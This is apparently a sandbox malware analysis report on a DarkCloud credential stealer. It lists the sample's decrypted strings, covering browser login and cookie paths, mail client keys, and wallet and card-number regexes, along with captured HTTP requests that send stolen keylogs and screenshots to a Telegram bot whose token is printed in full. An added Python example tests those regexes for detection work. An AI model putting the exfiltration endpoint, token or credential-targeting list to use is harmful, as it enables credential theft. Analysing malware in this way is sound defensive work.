Windows Analysis Report
MSM8C42iAN.exe

Overview

General Information

Sample name: MSM8C42iAN.exe
(renamed because the original name is a hash value)
Original sample name: d2678115448e9a9e3909fb7dcaf85eca9a28326fbd93d77d8608fd4d526c7dbb.exe
Analysis ID: 1562316
MD5: 1a170c3b6fba79020b7c24631d25ad93
SHA1: 4b2f3033eea4069c5685e9e6ca782f8f2551a685
SHA256: d2678115448e9a9e3909fb7dcaf85eca9a28326fbd93d77d8608fd4d526c7dbb
Tags: exe, user-adrian__luca

Detection

DarkCloud
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkCloud
AI detected suspicious sample
Machine Learning detection for sample
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

AV Detection

Source: MSM8C42iAN.exe Avira: detected
Source: MSM8C42iAN.exe Malware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendMessage?chat_id=6115850689"}
Source: MSM8C42iAN.exe ReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: MSM8C42iAN.exe Joe Sandbox ML: detected
Source: MSM8C42iAN.exe String decryptor: Cookies
Source: MSM8C42iAN.exe String decryptor: ^(0x){1}[0-9a-fA-F]{40}$
Source: MSM8C42iAN.exe String decryptor: ^([13][a-km-zA-HJ-NP-Z1-9]{25,34})|^((bitcoincash:)?(q|p)[a-z0-9]{41})|^((BITCOINCASH:)?(Q|P)[A-Z0-9]{41})$
Source: MSM8C42iAN.exe String decryptor: ^([r])([1-9A-HJ-NP-Za-km-z]{24,34})$
Source: MSM8C42iAN.exe String decryptor: ^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$
Source: MSM8C42iAN.exe String decryptor: ^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$
Source: MSM8C42iAN.exe String decryptor: ^G[ABCDEFGHIJKLMNOPQRSTUVWXYZ234567]{55}$
Source: MSM8C42iAN.exe String decryptor: \Default\Login Data
Source: MSM8C42iAN.exe String decryptor: \Login Data
Source: MSM8C42iAN.exe String decryptor: //setting[@name='Password']/value
Source: MSM8C42iAN.exe String decryptor: Password :
Source: MSM8C42iAN.exe String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: MSM8C42iAN.exe String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: MSM8C42iAN.exe String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: MSM8C42iAN.exe String decryptor: SMTP Email Address
Source: MSM8C42iAN.exe String decryptor: NNTP Email Address
Source: MSM8C42iAN.exe String decryptor: Email
Source: MSM8C42iAN.exe String decryptor: HTTPMail User Name
Source: MSM8C42iAN.exe String decryptor: HTTPMail Server
Source: MSM8C42iAN.exe String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: MSM8C42iAN.exe String decryptor: Password
Source: MSM8C42iAN.exe String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: MSM8C42iAN.exe String decryptor: Foxmail.exe
Source: MSM8C42iAN.exe String decryptor: ^3[47][0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(6541|6556)[0-9]{12}$
Source: MSM8C42iAN.exe String decryptor: ^389[0-9]{11}$
Source: MSM8C42iAN.exe String decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
Source: MSM8C42iAN.exe String decryptor: ^63[7-9][0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
Source: MSM8C42iAN.exe String decryptor: ^9[0-9]{15}$
Source: MSM8C42iAN.exe String decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
Source: MSM8C42iAN.exe String decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
Source: MSM8C42iAN.exe String decryptor: Mastercard
Source: MSM8C42iAN.exe String decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
Source: MSM8C42iAN.exe String decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
Source: MSM8C42iAN.exe String decryptor: ^(62[0-9]{14,17})$
Source: MSM8C42iAN.exe String decryptor: Visa Card
Source: MSM8C42iAN.exe String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
Source: MSM8C42iAN.exe String decryptor: Visa Master Card
Source: MSM8C42iAN.exe String decryptor: \signons.sqlite
Source: MSM8C42iAN.exe String decryptor: \logins.json
Source: MSM8C42iAN.exe String decryptor: mail\
Source: MSM8C42iAN.exe String decryptor: \Accounts\Account.rec0
Source: MSM8C42iAN.exe String decryptor: \AccCfg\Accounts.tdat
Source: MSM8C42iAN.exe String decryptor: EnableSignature
Source: MSM8C42iAN.exe String decryptor: Application : FoxMail
Source: MSM8C42iAN.exe String decryptor: encryptedUsername
Source: MSM8C42iAN.exe String decryptor: logins
Source: MSM8C42iAN.exe String decryptor: encryptedPassword
Source: MSM8C42iAN.exe String decryptor: \Cookies
Source: MSM8C42iAN.exe String decryptor: \Default\Cookies
Source: MSM8C42iAN.exe String decryptor: \cookies.sqlite
Source: MSM8C42iAN.exe String decryptor: \cookies.db
Source: MSM8C42iAN.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49934 version: TLS 1.2
Source: Binary string: W.pdb4 source: MSM8C42iAN.exe
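The regular expressions recovered by the string decryptor above are anchored full-value patterns for cryptocurrency addresses and payment-card numbers, which is what the stealer hunts for in clipboard and form data. The block below is an added example, not code from the report or from the sample: it runs a subset of those patterns verbatim against constructed inputs. The coin and card labels (Ethereum, Bitcoin/Bitcoin Cash, Ripple, Monero, Litecoin, Stellar; American Express, Diners Club, JCB, Visa/Mastercard) are this example's own reading of the patterns, not something the report states. Two things it makes visible: the first Bitcoin alternative has no trailing `$`, so it also matches text that merely starts with an address, and the JCB pattern as printed above carries doubled backslashes, which a regex engine reads as a literal backslash followed by the letter d. Whether that doubling is in the binary or only in the report's rendering cannot be told from this page, so the example keeps the printed form and places a single-escaped variant beside it for comparison.

```python
"""Added example for this page (not from the sandbox report or the DarkCloud
sample): apply the decrypted wallet/card regexes to constructed inputs."""
import re

# Patterns copied verbatim from the "String decryptor" entries above.
# The labels are assumptions based on well-known address formats.
WALLET_PATTERNS = {
    "ethereum": r"^(0x){1}[0-9a-fA-F]{40}$",
    "bitcoin": (r"^([13][a-km-zA-HJ-NP-Z1-9]{25,34})|^((bitcoincash:)?(q|p)[a-z0-9]{41})"
                r"|^((BITCOINCASH:)?(Q|P)[A-Z0-9]{41})$"),   # first branch has no $
    "ripple": r"^([r])([1-9A-HJ-NP-Za-km-z]{24,34})$",
    "monero": r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
    "litecoin": r"^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$",
    "stellar": r"^G[ABCDEFGHIJKLMNOPQRSTUVWXYZ234567]{55}$",
}
# Card patterns, also verbatim; labels are assumptions from the BIN ranges.
CARD_PATTERNS = {
    "amex": r"^3[47][0-9]{13}$",
    "diners": r"^3(?:0[0-5]|[68][0-9])[0-9]{11}$",
    "jcb_as_printed": r"^(?:2131|1800|35\\d{3})\\d{11}$",   # doubled backslashes, as on the page
    "jcb_unescaped": r"^(?:2131|1800|35\d{3})\d{11}$",      # this example's corrected variant
    "visa_mastercard": r"^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$",
}


def classify(value: str) -> list:
    """Return the sorted labels of every pattern that matches `value`.

    re.search is used on purpose: the patterns carry their own anchors, and
    the Bitcoin pattern anchors only some of its alternatives, so search()
    reproduces what a regex engine does with the string as the binary holds it.
    """
    patterns = {**WALLET_PATTERNS, **CARD_PATTERNS}
    return sorted(name for name, pat in patterns.items() if re.search(pat, value))


# Constructed inputs: synthetic addresses made of repeated base58 characters and
# the publicly documented test card numbers; none of these are real accounts.
SAMPLES = {
    "0x" + "a1" * 20: "Ethereum-shaped",
    "3" + "A" * 33: "P2SH-shaped, overlaps Bitcoin and Litecoin patterns",
    "4A" + "B" * 93: "Monero-shaped",
    "1" + "A" * 33 + " pasted after the address": "trailing text still matches Bitcoin",
    "0x" + "a1" * 20 + " trailing": "trailing text defeats the Ethereum pattern",
    "378282246310005": "Amex test number",
    "3530111333300000": "JCB test number: only the unescaped variant hits",
}

if __name__ == "__main__":
    for sample, note in SAMPLES.items():
        print(f"{sample[:24]:<26} {classify(sample)!s:<32} {note}")
```

The overlap on `3`-prefixed values is worth noting: the Bitcoin and Litecoin patterns both accept them, so a single clipboard hit can be tagged twice. The anchoring inconsistency matters for detection engineers writing their own clipboard-hijack rules: a pattern with `^` but no `$` will fire on free text, which is a false-positive source the sample's author apparently accepted.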

Networking

Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49810 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49819 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49810 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49843 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49858 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49858 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49867 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49882 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49882 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49891 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49918 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49907 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49907 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49945 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49934 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49934 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49961 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.9:49961 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.9:49970 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 162.55.60.2
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: showip.net
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49727 -> 162.55.60.2:80
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 8455
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 634
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 601
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 568
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 568
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 601
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 3932422
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    User-Agent: Project1
    Host: showip.net
Source: global traffic DNS traffic detected: DNS query: showip.net
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 8455
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: MSM8C42iAN.exe, 00000000.00000003.1442468987.0000000003451000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schema.org
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net.
Source: MSM8C42iAN.exe, 00000000.00000003.1891223171.000000000060F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1813011207.000000000060E000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.0000000000607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net/
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.0000000000607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net/1
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.net4
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netd
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netll
Source: MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://showip.netpD
Source: MSM8C42iAN.exe, 00000000.00000003.1442490992.000000000065C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.maxmind.com
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1891081431.0000000003493000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1891132344.0000000000664000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: MSM8C42iAN.exe, 00000000.00000003.1891132344.0000000000664000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/abcdefghijklmnopqrstuvwxyz
Source: MSM8C42iAN.exe String found in binary or memory: https://api.telegram.org/bot
Source: MSM8C42iAN.exe, 00000000.00000003.1891081431.0000000003493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=
Source: MSM8C42iAN.exe, 00000000.00000003.1813114556.0000000000667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSM8C42iAN.exe, 00000000.00000003.1403080623.00000000005D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSM8C42iAN.exe, 00000000.00000003.1442535526.000000000061F000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442510011.0000000000641000.00000004.00000020.00020000.00000000.sdmp, MSM8C42iAN.exe, 00000000.00000003.1442580909.00000000005A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: MSM8C42iAN.exe, 00000000.00000003.1890989393.000000000346B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
